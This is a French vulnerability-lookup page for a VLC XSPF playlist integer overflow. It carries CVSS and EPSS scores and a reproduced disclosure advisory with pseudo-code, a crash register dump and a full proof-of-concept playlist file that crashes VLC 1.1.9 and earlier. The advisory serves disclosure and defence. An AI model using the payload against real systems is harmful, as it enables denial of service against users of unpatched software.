CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Integer overflow in the XSPF playlist parser in VideoLAN VLC media player 0.8.5 through 1.1.9 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unspecified vectors that trigger a heap-based buffer overflow.
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
6.01%
–
–
2022-04-03
–
–
6.01%
–
–
2023-02-26
–
–
6.01%
–
–
2023-03-12
–
–
–
89.75%
–
2023-03-26
–
–
–
88.31%
–
2023-07-16
–
–
–
87.09%
–
2023-09-10
–
–
–
85%
–
2023-11-05
–
–
–
78.99%
–
2023-12-24
–
–
–
37.57%
–
2024-02-18
–
–
–
27.9%
–
2024-04-07
–
–
–
16.62%
–
2024-06-02
–
–
–
13.36%
–
2024-08-25
–
–
–
16.26%
–
2024-12-22
–
–
–
17.96%
–
2025-01-05
–
–
–
21.34%
–
2025-02-16
–
–
–
18.89%
–
2025-01-19
–
–
–
21.34%
–
2025-02-16
–
–
–
18.89%
–
2025-03-18
–
–
–
–
33.75%
2025-04-15
–
–
–
–
36.22%
2025-04-15
–
–
–
–
36.22,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2011-06-07 22h00 +00:00 Auteur : TecR0c EDB Vérifié : Yes
TITLE
VLC Media Player XSPF Local File Integer overflow in XSPF playlist parser
AFFECTED VERSIONS
VLC media player 1.1.9 down to 0.8.5
VENDOR
VideoLAN Organisation
CLASS
Denial of Service (DoS)
RESOURCES
http://www.videolan.org/security/sa1104.html
PRODUCT DESCRIPTION
VLC is a free and open source cross-platform multimedia player and
framework that plays most multimedia files as well as DVD, Audio CD,
VCD, and various streaming protocols.
TECHNICAL DETAILS
XSPF file is the XML format for sharing playlists.
A sample of the XSPF document is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
<trackList>
<track><location>file:///crash/tecr0c.mp3</location></track>
</trackList>
</playlist>
The VLC XSPF file uses a tag <vlc:id></vlc:id> in the component Demuxers: Playlist
which accepts decimal values for the vlc:id. When entering a large value that is
beyond the memory segment that is allocated for program data the program crashes.
Setting <vlc:id> value to 1073741823,e.g. <vlc:id>1073741823</vlc:id>
will results in a MEMORY ACCESS VIOLATION and the application crash.
The vulnerable code in module libplaylist_plugin.dll looks like (pseudo C code example):
do
{
__counter += 8;
mem->dword0 = 0;
mem->dword4 = 0;
mem->dword8 = 0;
mem->dwordC = 0;
mem->dword10 = 0;
mem->dword14 = 0;
mem->dword18 = 0;
mem->dword1C = 0;
++mem; <-- violation happens here when mem value is greater then memory segment
}
while ( __counter <= __controlled_value_edx );
}
};
Once we hit an address that does not exist we will result in a Denial of Service condition.
EAX 01A97FE8
ECX 00003320
EDX 3FFFFFFF <--------------- Value we control
EBX 01A972F8
ESP 02B6FBA8
EBP 02B6FCC0
ESI 00000007
EDI 01A8B388
EIP 7024FA5E libplayl.7024FA5E
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFAF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 6900 00AECAB0 00ADEB10
ST1 empty +UNORM 000B 003F0428 694C2808
ST2 empty -UNORM EB10 00AECAB0 00ADEB10
ST3 empty 0.9999999999999573674
ST4 empty 0.5000000000000000000
ST5 empty 0.9999999999999573674
ST6 empty 0.0
ST7 empty 559.00000000000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
End of block:
01A97FE8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01A97FF8 00 00 00 00 00 00 00 00 ........
PROOF OF CONCEPT (PoC)
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
<title>Playlist</title>
<trackList>
<track>
<location>file:///C:/Users/tecr0c/Desktop/tecr0c-win.mp3</location>
<duration>992</duration>
<extension application="http://www.videolan.org/vlc/playlist/0">
<vlc:id>1073741823</vlc:id>
</extension>
</track>
</trackList>
<extension application="http://www.videolan.org/vlc/playlist/0">
<vlc:item tid="0" />
</extension>
</playlist>
FIX
VLC Media Player 1.1.10
TIMELINE
03062011 Contacted vendor with PoC
05062011 Bug fixed by vendor
08062011 Patch release to public in 1.1.10